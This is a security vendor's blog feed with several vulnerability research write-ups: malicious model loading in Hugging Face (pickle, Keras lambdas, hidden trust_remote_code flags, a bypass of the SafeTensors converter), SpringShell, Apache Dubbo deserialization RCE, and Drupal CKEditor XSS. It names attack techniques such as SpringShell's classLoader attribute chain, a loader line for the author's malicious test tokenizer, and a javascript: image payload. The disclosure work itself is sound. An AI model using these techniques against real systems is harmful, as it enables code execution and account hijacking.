Dor Tumarkin, Author at Checkmarx https://checkmarx.com/author/dortumarkin/ The world runs on code. We secure it. Thu, 21 Nov 2024 17:36:10 +0000 en-US hourly 1 https://wordpress.org/?v=6.6.1 https://checkmarx.com/wp-content/uploads/2024/06/cropped-cx_favicon-32x32.webp Dor Tumarkin, Author at Checkmarx https://checkmarx.com/author/dortumarkin/ 32 32 “Free Hugs” – What to be Wary of in Hugging Face – Part 2  https://checkmarx.com/blog/free-hugs-what-to-be-wary-of-in-hugging-face-part-2/ Thu, 21 Nov 2024 12:00:48 +0000 https://checkmarx.com/?p=99009 Enjoy Threat Modeling? Try Threats in Models! 


Previously… 
In part 1 of this 4-part blog, we discussed Hugging Face, the potentially dangerous trust relationship between Hugging Face users and the ReadMe file, exploiting users who trust ReadMe and provided a glimpse into methods of attacking users via malicious models. 
In part 2, we explore dangerous model protocols more in-depth– going into the technical reasons as to why exactly are models running code. 

Angry pickle


Introduction to Model Serialization  

A model is a program that was trained on vast datasets to either recognize or generate content based on statistical conclusions derived from those datasets.  
To oversimplify, they’re just data results of statistics. However, do not be misled – models are code, not plain data. This is often stressed in everything ML, particularly in the context of security. Without going into too much detail – it is inherent for many models to require logic and functionality which is custom or specific, rather than just statistical data.  
Historically (and unfortunately) that requirement for writable and transmittable logic encouraged ML developers to use complex object serialization as a means of model storage – in this case types of serialization which could pack code. The quickest solution to this problem is the notoriously dangerous pickle, used by PyTorch to store entire Torch objects, or its more contextual and less volatile cousin marshal, used by TensorFlow’s lambda layer to store lambda code. 

Pickle code snippet

Please stop using this protocol for things. Please. 

While simple serialization involves data (numbers, strings, bytes, structs), more complex serialization can contain objects, functions and even code – and that significantly raises the risk of something malicious lurking inside the models.

Browser warning on Pickle module

Writing’s on the wall there, guys

Protecting these dangerous deserializers while still using them is quite a task. For now, let’s focus on exploitation. This is quite well documented at this point, though there have been some curious downgrades exposed during this research. 

Exploiting PyTorch 

PyTorch is a popular machine learning library – extremely popular on Hugging Face andthe backbone of many ML frameworks supported on HF. We’ll have more on those (and how to exploit them) in a future blog. 
PyTorch relies on pickling to save its output, which can contain an arbitrary method with arbitrary variables invoked upon deserialization with the load function; this works the same for PyTorch: 

Import torch commend code snippet

If this looks identical to the previous Pickle example to you then that’s because it is. 

Note that the source code for BadTorch doesn’t need to be in scope – the value of __reduce__ is packed into the pickle, and its contents will execute on any pickle.load action. 
To combat this, PyTorch added a weights_only flag. This flag detects anything outside of a very small allowlist as malicious and rejects it, severely limiting if not blocking exploitation. It is used internally by Hugging Face’s transformers, which explains why it can safely load torches even when dangerous and starting version 2.4 This flag is encouraged via a warning where it is stated that in the future this will be a default behavior.  

Hugging face transformers warring text

At the time of writing, PyTorch does not yet enable weights_only mode by default. Seeing how the rampant use of torch.load in various technologies is (this will be discussed in part 3), it would be safer to believe this change when we see it, because it is likely to be a breaking change. It would then be up to the maintainers whose code this change breaks to either adapt to this change or disable this security feature. 

TensorFlow to Code Execution 

TensorFlow, is a different machine learning library that offers various ways to serialize objects as well. 
Of particular interest to us are serialized TensorFlow objects in protocols that may contain serialized lambda code. Since lambdas are code, they get executed after being unmarshled from Keras’, being a high-level interface library for TensorFlow.
Newer versions of TensorFlow do not generate files in the older Keras format (TF1, which uses several protobuf files or as h5). 
To observe this, we can look at the older TensorFlow to 2.15.0, which allows generating a model that would be loaded using the malicious code (credit to Splinter0 for this particular exploit): 

Import tensortflow commend code snippet

Note that the functionality to serialize lambdas has been removed in later versions of the protocol. For Keras, which supports Lambdas, these are now relying on annotations to link lambdas to your own code, removing arbitrary code from the process. 
This could have been a great change if it eliminated support for the old dangerous formats, but it does not – it only removes serialization (which creates the payload) but not execution after deserialization (which consumes it). 
Simply put – just see for yourself: if you generate a payload like the above model in an h5 format using the dangerous tensorflow 2.15.0, and then update your tensorflow: 

Import tensortflow commend code snippet

Exploit created on tensorflow 2.15.0, exploit pops like a champ on 2.18.0

In other words – this is still exploitable. It’s not really a Keras vulnerability (in the same vein torch.load “isn’t vulnerable”), though, but rather it’s a matter of how you end up using it – we’ve disclosed it amongst several other things to Hugging Face in August 2024, but more on that in a later write-up.

SafeTensors

Currently, Hugging Face is transferring models from a pickle format to SafeTensors, which use a more secure deserialization protocol that is not as naïve (but not as robust) as pickles.

SafeTensors simply use a completely different language (Rust) and a much simpler serialization protocol (Serde), which requires customization for any sort of automatic behavior post-deserialization.

Moving from Torch to SafeTensors

However, there is a fly in the SafeTensors ointment – importing. It makes sense that the only way to import from another format is to open it using legacy libraries, but it’s also another vulnerable way to invoke Torches. convert.py, a part of the SafeTensors library intended to convert torches to the SafeTensors format. However, the conversion itself is simply a wrapper for torch.load:
https://github.com/huggingface/safetensors/blob/main/bindings/python/convert.py#L186
The HF Devs are aware of this and have added a prompt – but that can be bypassed with a -y flag:

python convert code result

Model will run whoami on conversion. Disclaimer: image manipulated to exclude a bunch of passive warnings that might warn you, right after it’s way too late

The problem here is the very low trust barrier to cross – since, as discussed, most configuration is derived from ReadMe commands. This flag can simply be hidden between other values in instructions, which makes convert.py not just a conversion tool but also another vector to look out for.

There are many more conversion scripts in the transformers library that still contain dangerous calls to torch.load and can be found on the Transformers’ Github.

Conclusion

It’s interesting to see how what’s old is new again. Old serialization protocols which are easier to implement and use, are making a comeback through new, complex technology – particularly when security was never a concern during experimentation, and again becoming deeply ingrained in relatively new technology. The price for that speed is still being paid, with the entire ecosystem struggling to pivot to a secure and viable service by slugging through this tech debt.

There are several recommendations to be made when judging models by their format:

  • With serialization mechanisms baked into the ecosystem, you should avoid the legacy ones, and review those that are middle-of-the-way and historically vulnerable.
  • Consider a transition to SafeTensor or other protocols that are identified as secure and do not execute code or functions on deserialization and reject older potentially dangerous protocols.
    • BUT never trust conversion tools to safely defuse suspicious models (without reviewing them first).
  • And – as always – make sure you trust the maintainer of the Model.

On The Next Episode…  

Now that we’ve discussed a couple of vulnerable protocols, we’ll demonstrate how they can be exploited in practice against Hugging Face integrated libraries. 

]]>
Pickle codesnippet1 url pic codesnippet2 textsnippet codesnippet3 codesnippet4 code5
“Free Hugs” – What To Be Wary of in Hugging Face – Part 1  https://checkmarx.com/blog/free-hugs-what-to-be-wary-of-in-hugging-face-part-1/ Thu, 14 Nov 2024 12:00:00 +0000 https://checkmarx.com/?p=98796 Introduction 

GenAI has taken the world by storm. To meet the needs for development of LLM/GenAI technology through open-source, various vendors have risen to meet the need to spread this technology. 

One well-known platform is Hugging Face – an open-source platform that hosts GenAI models. It is not unlike GitHub in many ways – it’s used for serving content (such as models, datasets and code), version control, issue tracking, discussions and more. It also allows running GenAI-driven apps in online sandboxes. It’s very comprehensive and at this point a mature platform chock full of GenAI content, from text to media. 

In this series of blog posts, we will explore the various potential risks present in the Hugging Face ecosystem. 

Championing logo design Don’ts (sorry not sorry opinions my own) 

Hugging Face Toolbox and Its Risks 

Beyond hosting models and associated code, Hugging Face is a also maintainer of multiple libraries for interfacing with all this goodness – libraries for uploading, downloading and executing models to the Hugging Face platform. From a security standpoint – this offers a HUGE attack surface to spread malicious content through. On that vast attack surface a lot has already been said and many things have been tested in the Hugging Face ecosystem, but many legacy vulnerabilities persist, and bad security practices still reign supreme in code and documentation;  these can bring an organization to its knees (while being practiced by major vendors!) and known issues are shrugged off because “that’s just the way it is” – while new solutions suffer from their own set of problems.. 

ReadMe.md? More Like “TrustMe.md” 

The crux of all potentially dangerous behavior around marketplaces and repositories is trust – trusting the content’s host, trusting the content’s maintainer and trusting that no one is going to pwn either. This is also why environments that allow obscuring malicious code or ways to execute it are often more precarious for defenders. 

While downloading things from Hugging Face is trivial, actually using them is finnicky – in that there is no one global definitive way to do so and trying to do it any other way than the one recommended by the vendor will likely end in failure. Figuring out how to use a model always boils down to RTFM – the ReadMe. 

But can ReadMe files be trusted? Like all code, there are good and bad practices – even major vendors fall for that. For example, Apple actively uses dangerous flags when instructing users on loading their models: 

trust_remote_code sounds like a very reasonable flag to set to True 

There are many ways to dangerously introduce code into the process, simply because users are bound to trust what the ReadMe presents to them. They can load malicious code, load malicious models in a manner that is both dangerous and very obscure. 

Configuration-Based Code Execution Vectors 

Let’s start by examining the above configurations in its natural habitat.

 Transformers is one of the many tools Hugging Face provides users with, and its purpose is to normalize the process of loading models, tokenizers and more with the likes of AutoModel and AutoTokenizer. It wraps around many of the aforementioned technologies and mostly does a good job only utilizing secure calls and flags. 

However – all of that security goes out the window once code execution for custom models that load as Python code behind a flag, “trust_remote_code=True”, which allows loading classes for models and tokenizers which require additional code and a custom implementation to run. 

While it sounds like a terrible practice that should be rarely used, this flag is commonly set to True. Apple was already mentioned, so here’s a Microsoft example: 

why wouldn’t you trust remote code from Microsoft? What are they going to do, force install Window 11 on y- uh oh it’s installing Windows 11 

Using these configurations with an unsecure model could lead to unfortunate results. 

Code loads dangerous config à config loads code module à code loads OS command 

  • Code will attempt to load an AutoModel from a config with the trust_remote_code flag 
  • Config will then attempt to load a custom class model from “exploit.SomeTokenizer” which will import “exploit” first, and then look for “SomeTokenizer” in that module 
  • SomeTokenizer class doesn’t exist but exploit.py has already been loaded, and executing malicious commands 

This works for auto-models and auto-tokenizers, and in transformer pipelines: 

in this case the model is valid, but the tokenizer is evil. Even easier to hide behind! 

Essentially this paves the way to malicious configurations – ones that seem secure but aren’t. There are plenty of ways to hide a True flag looking like a False flag in plain sight: 

  • False is False 
  • {False} is True – it’s a dict 
  • “False” is True – it’s a str 
  • False < 1 – is True, just squeeze it to the side: 

This flag is set as trust_remote_code=False……………………………………………………………………………….………….n’t 

While these are general parlor tricks to hide True statements that are absolutely not exclusive to any of the code we’ve discussed – hiding a dangerous flag in plain sight is still rather simple. However, the terrible practice by major vendors to have this flag be popular and expected means such trickery might not even be required – it can just be set to True. 

Of course, this entire thing can be hosted on Hugging Face – models are uploaded to repos in profiles. Providing the name of the profile and repo will automatically download and unpack the model, only to load arbitrary code. 

import transformers 

yit = transformers.AutoTokenizer.from_pretrained(“dortucx/unkindtokenizer”, trust_remote_code=True)    

print(yit) 

Go on, try it. You know you want to. What’s the worst that can happen? Probably nothing. Right? Nothing whatsoever. 

Dangerous Coding Practices in ReadMes 

Copy-pasting from ReadMes isn’t just dangerous because they contain configurations in their code, though – ReadMes contain actual code snippets (or whole scripts) to download and run models. 

We will discuss many examples of malicious model loading code in subsequent write-ups but to illustrate the point let’s examine the huggingface_hub library, a Hugging Face client. The hub has various methods for loading models automatically from the online hub, such as “huggingface_hub.from_pretrained_keras”. Google uses it in some of its models: 

And if it’s good enough for Google, it’s good enough for everybody! 

But this exact method also supports dangerous legacy protocols that can execute arbitrary code. For example, here’s a model that is loaded using the exact same method using the huggingface_hub client and running a whoami command: 

A TensorFlow model executing a “whoami” command, as one expects! 

Conclusions 

The Hugging Face ecosystem, like all marketplaces and open-source providers, suffers from issues of trust, and like many of its peers – has a variety of blindspots, weaknesses and practices the empower attackers to easily obscure malicious activity. 

There are plenty of things to be aware of – for example if you see the trust_remote_code flag being set to True – tread carefully. Validate the code referenced by the auto configuration.  

Another always-true recommendation is to simply avoid untrusted vendors and models. A model configured incorrectly from a trusted model is only trustworthy until that vendor’s account is compromised, but any model from any untrusted vendor is always highly suspect. 

As a broader but more thorough methodology, however, a user who wants to securely rely on Hugging Face as a provider should be aware of many things – hidden evals, unsafe model loading frameworks, hidden importers, fishy configuration and many, many more.  It’s why one should read the rest of these write-ups on the matter. 

On The Next Episode… 

Now that we’ve discussed the very basics of setting up a model – we’ve got exploit deep-dives, we’ve got scanner bypasses, and we’ve also got more exploits. Stay tuned. 

]]>
image image image image image image image
SpringShell – Remote Code Execution via Spring Web https://checkmarx.com/blog/springshell-remote-code-execution-via-spring-web/ Thu, 31 Mar 2022 12:04:03 +0000 https://checkmarx.com/?p=74779 SpringShell is a new vulnerability in Spring, the world’s most popular Java framework, which enables remote code execution (RCE) using ClassLoader access to manipulate attributes and setters. This issue was unfortunately leaked online without responsible disclosure before an official patch was available. This vulnerability has been assigned CVE-2022-22965.

At present, known exploitation of this vulnerability requires a combination of Spring, Java version 9 and up, and Tomcat; however, this is likely to change, due to the fact this exposure occurs in Spring and allows access to various sensitive components. It is therefore safest to assume all Spring Web instances are likely to be vulnerable.

Note that currently there is another critical RCE vulnerability making headlines around Spring Cloud, which involves a similar exploitation technique of accessing functions. This article does not cover that issue.

Technology Breakdown

The current focus at large is on the known exploitation of Spring, Java version 9 and up, and Tomcat.

Spring allows rapid and lightweight development for Java applications, particularly for web applications. Tomcat is a very popular webserver for Java applications, and is also embedded into Spring Boot. This means the combination of Spring and Tomcat is almost ubiquitous, making this vulnerability extremely common. Java 9 has been around for 5 years and is also a requirement for this issue.

Another requirement for the specific exploit is accepting POST requests with POJOs to trigger binding; there are very few Spring web-applications that do not.

Am I Vulnerable?

If you are using Spring Web which is exposed to the internet running on Java 9 and later – you are most likely exposed to this vulnerability. Current exploits available in the wild require a combination of Spring and Tomcat, but Tomcat is merely an instrument in a gadget used to trigger this RCE; more gadgets may be found as exposed by this vulnerability.

How Does It Work?

The best way to explain how this vulnerability is exploitable is by breaking down the available exploit. However – note that while this exploit affects a particular configuration of Spring, Tomcat, and Java – not having this particular configuration does not imply you are safe from exploitation, only from this particular variant.

The current RCE PoC exploit involves the following steps:

  • Finding a POST endpoint in the Spring application
  • Submitting a request to reconfigure Tomcat to output a log to an arbitrary JSP file in an accessible location which serves JSP files on the Tomcat server
  • Triggering a write to this log of user-provided values, to create a JSP file with malicious code
  • Execute the JSP file by requesting it via HTTP, as per standard JSP behavior

Let’s break it down.

ClassLoader Manipulation

It is possible to access ClassLoader variables via POST parameters prefixed by class.module.classLoader.* in Spring, due to parameter binding. Years ago, Spring allowed access to ClassLoader directly in this manner which led to other exploits (e.g., CVE-2010–1622). This access then made a deny-list for specific parameters as mitigation. However, starting with Java 9 — Modules were added which allowed reaching ClassLoader via class.getModule().getClassLoader(), which is precisely why the deny-list approach to accessing ClassLoader in the past could be bypassed by class.module.classLoader.

This manipulation exposes internal objects to user-provided values, and is the core of this vulnerability.

Tomcat Context Reconfiguration

Using this ClassLoader manipulation on a Tomcat web server, it is possible for attackers to directly access the Tomcat context, which in itself contains Tomcat configurations.

In this exploit, Tomcat is reconfigured to write logs to a new file on an attacker’s behest. This file, instead of just being a log file, will also double as an executable JSP file.

The following attributes are edited to write the arbitrary log file:

  • class.module.classLoader.resources.context.parent.pipeline.first.directory — the path to which the log file is written. In standard Tomcat dev environments, webapps/ROOT will expose a root folder for the webserver itself; however, in more custom prod environments an attacker may need to figure out where exactly malicious JSP files can be written to be remotely accessible
  • class.module.classLoader.resources.context.parent.pipeline.first.prefix — will determine the log file name
  • class.module.classLoader.resources.context.parent.pipeline.first.suffix — will determine the log file extension — for the purpose of exploitation this will be an executable servlet type such as JSP, but attackers can come up with various other potentially executable file types
  • class.module.classLoader.resources.context.parent.pipeline.first.pattern — this is the pattern that will be written to the log file; attackers will write malicious code instead of a pattern, such that on a logging event their malicious code will be written into the file
  • class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat — this is the date format, which is purposefully left blank to remove the noisy timestamps from the output of the exploit

Arbitrary File Write of a Malicious JSP File

For example, the following POST request can be sent:

This will override the log configurations to create a JSP servlet at the Tomcat’s web application root (“/”), allowing attackers to execute the malicious code in “pattern” by simply browsing to /ohno.jsp

Mitigation & Conclusions

According to  an update on the official Spring website, this issue is mitigated in Spring Framework versions 5.3.18 and 5.2.20. This article also contains a vendor-recommended workaround for those who cannot update at present.

From the looks of things and how analysis of this issue currently pans out — this vulnerability illustrates how the changes made to Java have incidentally made the Spring deny-list obsolete, in a way that has evaded detection for a significant amount of time. This highlights the ever-present issue of denying dangerous functionalities, rather than explicitly allowing safe ones, which is a behavior often prevalent in frameworks that offer a lot of dynamic and complex features.


Checkmarx SCA customers can scan their code for similar types of vulnerabilities and get the latest remediation guidance.

]]>
Screenshot-2022-03-31-071800-1 Burp-Hi-res-1024×166-1
The 0xDABB of Doom: CVE-2021-25641 https://checkmarx.com/blog/the-0xdabb-of-doom-cve-2021-25641/ Fri, 04 Jun 2021 14:01:09 +0000 https://www.checkmarx.com/?p=48698 Introduction

When I previously wrote the original Dubbo publication, we disclosed that issue as it was mitigated by the vendor. While the Dubbo “HTTP” protocol in that disclosure was trivially vulnerable to the most common Java deserialization attacks (as evidenced by the immediate cropping up of exploits for Dubbo as soon as a very broad description of the issue was published in a mailing list) – the so-called “HTTP” was an elective protocol, and honestly – there was no apparent reason to choose it over the default Dubbo protocol. This made it an unlikely misconfiguration, and most devs would probably just stick to the default Dubbo protocol; this made it very tempting to investigate Dubbo further.
The “Dubbo” protocol is a proprietary binary protocol which required some reverse-engineering of its inner logic and how it is being consumed by the endpoint. It actually wraps around the binary of the serialized object, adding meta-data and additional objects to the stream. The underlying deserializer defaults to Hessian2, configured to exclude many of the “known dangerous” classes often used to exploit such attacks. However, there were some ways to manipulate this protocol, such as elect the deserializer, which would then lead to RCE.

Vulnerability Overview

The Dubbo protocol is a proprietary protocol developed for Apache Dubbo for transmission of objects between Dubbo services. Apache Dubbo providers and consumers using certain versions of Dubbo, when configured to accept the default “Dubbo” protocol, allows a remote attacker to send a malformed stream containing a malicious object to the exposed service which would result in Remote Code Execution.

This RCE occurs with no authentication, and no knowledge on an attacker’s part is required to exploit this vulnerability – only an open port on a Provider server running Apache Dubbo. This issue applies to default configuration, where the built-in Dubbo protocol is used.

Severity

Checkmarx considers this vulnerability to have a CVS Score of 10.0 (Critical), as it is an unauthenticated remote code execution vulnerability which provides privileges at the Dubbo service’s permission level, allowing complete compromise of that service’s confidentiality, integrity, and accessibility.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

What’s Going On – Understanding the Dubbo Protocol

The server-side “Dubbo” protocol on a provider is used to expose a service, and methods within this service, to external consumers.
The “Dubbo” protocol has two general modes served over the same port:

  1. Telnet-like mode, where a CLI is available to allow invoking a method exposed by the provider service
  2. An RMI mode, where the TCP packet is then treated as a byte stream, which is deserialized to be used with the service offered by the Dubbo provider

Fig. 1 – Dubbo Telnet

While default behavior is Telnet-like, the way the remoting protocol is invoked is by providing a header which is built in the following manner:

  1. Two magic bytes – 0xdabb
  2. A flag byte – this flag determines:
    1. If this stream is a request or a response
    2. If this transaction is one-way or two-way
    3. Deserialization mechanism identifier (Hessian2, Kryo, Java etc.)
  3. Padding null-bytes, to allow for dynamic length
  4. Length of stream

This method is reminiscent of port-knocking, but instead of sending a stream of bytes to open a port, two preamble bytes are used to switch between protocols (Telnet-like mode and RMI-like mode).
The preamble header is then followed a stream sequence containing the following data:

  1. Dubbo Protocol version
  2. Service name (“Path”)
  3. Service version
  4. Method name
  5. Method argument types
  6. Method arguments
  7. Request attachments, which may contain additional data

All of the above data is read as a UTF string with the exception of 6 – method arguments; this is because a method argument may contain any Java object which may be passed to the Dubbo Provider, while other data is provided as Strings, to be used with reflections inside the code.
The open Dubbo port can be trivially fingerprinted as such by readily available tools, such as Nmap.

Fig. 2 – Dubbo telnetd Service, As It Appears on Nmap

The raw TCP request, including preamble and metadata, sends a request and receives a response over the same TCP stream, as demonstrated via Dubbo’s Quick Start sayHello demo:

Fig. 3 – Dubbo Protocol Request in Its Default Serialized Form

Fig. 4 – Dubbo Protocol Response in Dubbo Demo

Fig. 5 – Dubbo Protocol Breakdown

Attacking the Dubbo Protocol

The most commonly known Java-based gadget chains used for exploiting deserialization attacks rely on several key classes – these classes appear to be blacklisted on the default Hessian2 serializer.
The Dubbo protocol relies on the flags byte (3rd byte of the stream) to determine which serializerdeserializer to use when processing this stream. While the default is Hessian 2, and attacker may tamper with this flag to choose a different deserializer, exposing multiple additional options for serialization. These additional deserializers do not offer the same protection Hessian 2 does.
An attacker can modify the flag to choose either of the following protocols:

Both of these protocols are binary serialization protocols, and successfully deserialize the FastJSON gadget-chain.

Fig. 6 – The Majestic, Feral Beauty of a Kryo-Serialized FastJSON Gadget ByteStream

For the purpose of having the gadget chain deserialized, however, a compliant stream should be created containing the required preamble, headers, and metadata.
Since the exploit does not actually require Dubbo to successfully dispatch the request (in versions <= 2.7.5), but rather simply successfully read, parse and deserialize it, the stream itself can contain random or arbitrary strings. These strings are only there to serve as padding and satisfy multiple “readUTF” operations, until readObject is called on the stream, at which point FST or Kryo are the chosen deserializer and the exploit is triggered.

Recreating the Issue

An attacker can reimplement the Dubbo protocol with its byte preamble, header flags and content length, as well as dummy strings and a malicious object to satisfy the endpoint’s implementation for reading it.
The same gadget chain used in the previous exploit for 2.7.3 HTTP protocol, which allows remote OS command execution was found in the scope of vanilla Apache Dubbo, so long as dubbo-common is also in scope (more on this later).

Proof-of-Concept

Recreating a Victim Dubbo Instance for PoC

Either use the code sample from my previous research blog or follow this guide:

  1. Follow the Official Apache Dubbo Quick-Start guide until a functioning provider and registry are successfully created (see here for a full sample)
  2. Ensure dubbo-common, or a package where this dependency is not optional, are in scope

 Add the following dependencies to enable Spring Framework, Dubbo and Dubbo Common (presented in Maven pom.xml form for ease of use):

Triggering Vulnerability PoC

See this link for functioning POC code. The gadget chain being exploited here, which is native to Dubbo 2.7.3’s ecosystem, is clearly broken down in Part 1. The rest of this POC takes this gadget, and reimplements the Dubbo protocol to wrap it with the appropriate preamble, flags, and headers to exploit a vulnerable deserializer on a receiving Dubbo endpoint.

Fig. 7 – Deserialization Gadget Writes “whoops!” to Java Console, and Starts Calc.exe

Vulnerability Evolution

Between the disclosure of this issue and the CVE, this issue has evolved across several releases. For versions 2.7.5 and 2.7.6 – the vulnerable deserializers have been removed from the core packages into their own respective packages. This functionality is imported separately, in the form of the dubbo-serialization-kryo/fst packages. In 2.7.7, according to documentation, it is no longer possible to pass garbage values in the Dubbo stream – deserialization does not occur without a proper method and service name.

Conclusions

This exploit, following the previous PoC for exploiting the HTTP protocol in version 2.7.3, further illustrates the need for strict whitelisting combined with class resolution look-ahead within any remote invocation services that deal with serialized objects – not just for Dubbo, and not just for Java.
While this issue is glaring for Dubbo 2.7.3 and under, because of the gadget chain relying on an outdated FastJSON discovered and disclosed in the previous research, this only scratches the surface of this attack – other gadget chains may still exist within Dubbo’s internals, and most Dubbo instances will rely on other dependencies beyond those bundled with this software, allowing for a more diverse dependency ecosystem and allowing similar forms of exploitation to persist until a robust whitelist solution is used within Dubbo’s internals.
At present, it is safe to assume many (and probably most) instances of Dubbo <= 2.7.3 are vulnerable to remote code execution via deserialization of untrusted data, while any Dubbo version under 2.7.8 has some form of unsafe deserialization going on in the Dubbo Protocol pipeline, 2.7.9 has added a configuration flag to prevent “chosen deserializer” attacks such as this. Whether it is vulnerable is dependent on gadget availability – which is always a likely possibility.

Recommendations

  • Upgrade from Alibaba Dubbo to Apache Dubbo; Alibaba Dubbo does not appear to be officially maintained any longer
  • Update Apache Dubbo to its latest version
  • Ensure to never import unnecessary Dubbo packages, e.g. dubbo-serialization-kryo where Kryo is not actively used, to reduce attack surface against the RMI interface

Disclosure Timeline

2/5/20 – Disclosure of Dubbo RCE Deserialization Exploit
2/19/20 – Reminder #1 to Apache Security Team
4/6/20 – Reminder #2 to Apache Security Team
7/27/20 – Reminder #3 to Apache Security Team
1/22/21 – First Acknowledgement of Issue
2/26/21 – Fix Released
6/4/21 – Public Disclosure

Apache Package Versions

Deserialization RCE with FastJSON Gadget:
Vulnerable package: org.apache.dubbo.dubbo <= 2.7.3
Requirements:
org.apache.dubbo.dubbo-common <= 2.7.9
org.springframework.spring-web – 5.3.4
Deserialization vulnerability without FastJSON Gadget, requires additional deserialization gadget in scope:
Vulnerable package: org.apache.dubbo.dubbo <=2.7.6 – implementation dependent
Requirements:
org.apache.dubbo.dubbo-common <= 2.7.9
dubbo-serialization-kryo AND/OR dubbo-serialization-fst – <=2.7.9

Alibaba Package Versions

Despite certain signs of life, this is no longer officially maintained – all Alibaba Dubbo resources now point to Apache Dubbo.
Deserialization RCE with FastJSON Gadget:
Vulnerable package: com.alibaba.dubbo <= 2.6.7
Requirements:
Com.alibaba.dubbo-serialization-kryo OR Com.alibaba.dubbo-serialization-fst <= 2.6.7
org.springframework.spring-web – 5.3.4
Deserialization vulnerability without FastJSON Gadget, requires additional deserialization gadget in scope:
Vulnerable package: com.alibaba.dubbo <= 2.6.9
Requirements:
Com.alibaba.dubbo-serialization-kryo OR Com.alibaba.dubbo-serialization-fst <= 2.6.9
org.springframework.spring-web – 5.3.4

Final Words

Disclosures like this are part of the Checkmarx Security Research Team’s efforts to drive changes in software security practices. Checkmarx is committed to analyzing open source packages to help development teams build and deploy more secure software.

]]>
Drupal Core: Behind the Vulnerability https://checkmarx.com/blog/drupal-core-behind-the-vulnerability-part-2-defacement-stored-xss-and-self-xss/ Wed, 02 Dec 2020 08:12:36 +0000 https://www.checkmarx.com/?p=42648 As you may recall, back in June, Checkmarx disclosed multiple cross-site scripting (XSS) vulnerabilities impacting Drupal Core, listed as CVE-2020-13663, followed by a more technical breakdown of the findings in late November. Today, we’re releasing details surrounding additional, new vulnerabilities (CVE-2020-13669) uncovered in Drupal Core as part of our continued research of the open source CMS platform. All research was conducted and reported to Drupal by Dor Tumarkin of Checkmarx.

CVE-2020-13669 – Overview

Drupal Security Risk: Moderately Criticalhttps://www.drupal.org/sa-core-2020-010
Vulnerable versions:

  • Drupal 8.8 – before 8.8.10
  • Drupal 8.9 – before 8.9.6
  • Drupal 9 – before 9.0.6

Impact Summary

  • Inject malicious code in webpages via Cross-Site Scripting to:
    • Hijack user accounts
    • Inject malicious web-content, such as malicious login or payment forms
  • Defacing a page to hide its contents
  • Redirect users to a website of an attacker’s choice, allowing them to abuse users’ trust in the victim website

CVE-2020-13669 – FigCaption Widget – Self-XSS, Stored DOM Manipulation, and XSS Potential

Vulnerability Proof of Concept (PoC)

The Figure Caption Widget (“FigCaption”) allows even basic content contributors with Basic HTML content privileges to insert a caption into their content. It is bundled with Drupal Core’s default CKEditor.
The raw HTML of such a caption would be of the following form:


Once submitted or rendered, this HTML is morphed into an entire HTML tree that presents the image inside CKEditor. However, the “data-caption” attribute may itself contain HTML, which is then rendered, and suffers from multiple issues as follows:

  • A lack of coherence/consistency between HTML attribute whitelists for the general CKEditor and internal FigCaption HTML, which allows the HTML inside FigCaption to contain arbitrary attributes, allowing:
    • Injecting arbitrary attributes and classes into <a> HTML tags, such that classes with CSS that covers the entire app, defacing pages permanently with a redirection to a site of an attacker’s choosing (it should be noted that “on*” event attributes, such as “onclick”, are still properly sanitized)
    • Bypassing certain sanitizing behavior which could lead to XSS, given more widgets in the ecosystem, such as inserting the “javascript:” scheme into attributes that generally sanitize this scheme
  • A lack of sanitization when rendering in preview mode, allowing injecting <script> tags, which leads to self-XSS

Vulnerabilities Breakdown and Potential Implications

The issue affects the DOM in multiple ways, both stored and reflected from DOM. All issues here pertain to picture captions, which is a plugin added on top of CKEditor by the Drupal team.

Self-XSS PoC

Self-XSS occurs when users copy values into a CKEditor instance. This requires a much more involved user in an attack scenario—the user needs to copy and paste content into the page.
Copying the following payload and switching to an HTML view (in vanilla Drupal Core, by clicking the “Source” button) would result in XSS:

Page Defacement with Redirection – Stored DOM Manipulation PoC

The above self-XSS is sanitized by the server when submitted, as the caption itself has a separate server-side component for sanitization. However, this creates an inconsistency—two components provide dissimilar sanitization. The major issue is that sanitization outside of the caption for “Basic HTML” mode only allows the following tags and attributes:

While the server-side sanitizer allows only the same tags, it does not offer any sanitization for attributes beyond normal XSS sanitization (on* JS events, removing “javascript:” prefixes from attribute values, some style attributes). This allows injecting far more than just the basic HTML tags—classes can now be used to get styles, data-* attributes can be used to power certain widget functionality, and more.
For example, consider the following defacement which injects a clickable redirection button:


This allows injecting buttons into HTML UIs, which can redirect to other websites. This can be made even worse by adding the “joyride-modal-bg” class to cover the whole page:


Adding the “joyride-modal-bg” class to an “a” tag will turn the entire page into a gray block on top of all the content, as per “joyride-modal-bg”’s CSS properties. By having an “a” element cover the whole page, clicking anywhere on that element would redirect to an external website of an attacker’s choice as declared in “src”. This would allow attackers to deface the website or conduct phishing attacks by impersonating the website of origin, even from the lowly Basic HTML content adding permission.

The Broken Widget – Potential Stored XSS PoC

A potential exploit also exists by creating a partial widget. However, it’s not based on what the widget is when it is edited in CKEditor, but it’s based on attempting to inject the HTML product of a widget back into CKEditor. The product of a widget is the HTML generated by it, rather than the HTML fed to it:

As the previous exploits show, by combining the ability to add some benign HTML tag such as <em>, but with widget “data-*” and class attributes, an attacker is able to construct partial or broken widgets, which trigger when the page renders. Since widgets rewrite parts of the DOM, and trigger certain JS methods, this may allow a downstream DOM XSS.
For example, the following PoC, based on widget attributes, would trigger a broken widget from within the data-caption when viewed as Drupal content:

However, when browsing back to the edit view of this Drupal node, some of the broken widget’s functionality will trigger. The broken widget will read the value “src” in data-cke-widget-data’s JSON, and use it to populate the HTML attribute “src” inside the widget upon rendering the above payload in editor view, after it has been stored. This allows storing a payload that replaces the “src” attribute in the “img” tag with “javascript:alert(“XSS”)”:

This demonstrates that widget flow can be triggered from broken widgets to populate attributes, bypassing URL scheme sanitizers by inserting dangerous values into attributes after the page has already rendered.
The payload  <img src=javascript:[code] > only functions for older browsers; Chrome complains about the URL scheme, while Firefox, Edge, and the latest IE ignore it outright. However, note that if an appropriate widget was in the scope where it was possible to overwrite <a href> or <iframe src> in this way, it would be possible to store a DOM XSS payload here. Given additional widgets in a slightly less barebones ecosystem than standalone Drupal Core, a stored XSS is a very likely possibility using this vector.
Overall, an issue clearly exists in containment. It is possible to escape a restrictive Basic HTML sandbox to a looser one which allows injecting classes, ids and arbitrary data attributes, and store dangerous HTML in the most basic Drupal ecosystem.

Summary of Disclosure and Events

